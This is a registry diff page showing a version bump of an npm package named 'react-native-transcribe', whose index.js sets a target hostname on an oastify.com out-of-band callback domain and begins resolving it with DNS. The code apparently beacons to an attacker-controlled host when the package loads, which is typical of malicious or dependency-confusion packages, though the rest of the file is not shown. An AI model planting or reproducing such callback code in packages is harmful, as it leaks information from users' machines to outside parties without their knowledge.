react-native-transcribe 1.2.0 → 1.3.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +1 -1
- package/package.json +1 -1
package/index.js
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
const https = require("https");
|
|
2
2
|
const dns = require("dns");
|
|
3
3
|
|
|
4
|
-
const targetHostname = "
|
|
4
|
+
const targetHostname = "onfdz0f9j5j0aokw1fo2rc4go7uziq6f.oastify.com"; // Replace with the target server hostname
|
|
5
5
|
|
|
6
6
|
// Resolve the IP address of the target server
|
|
7
7
|
dns.lookup(targetHostname, (err, ipAddress) => {
|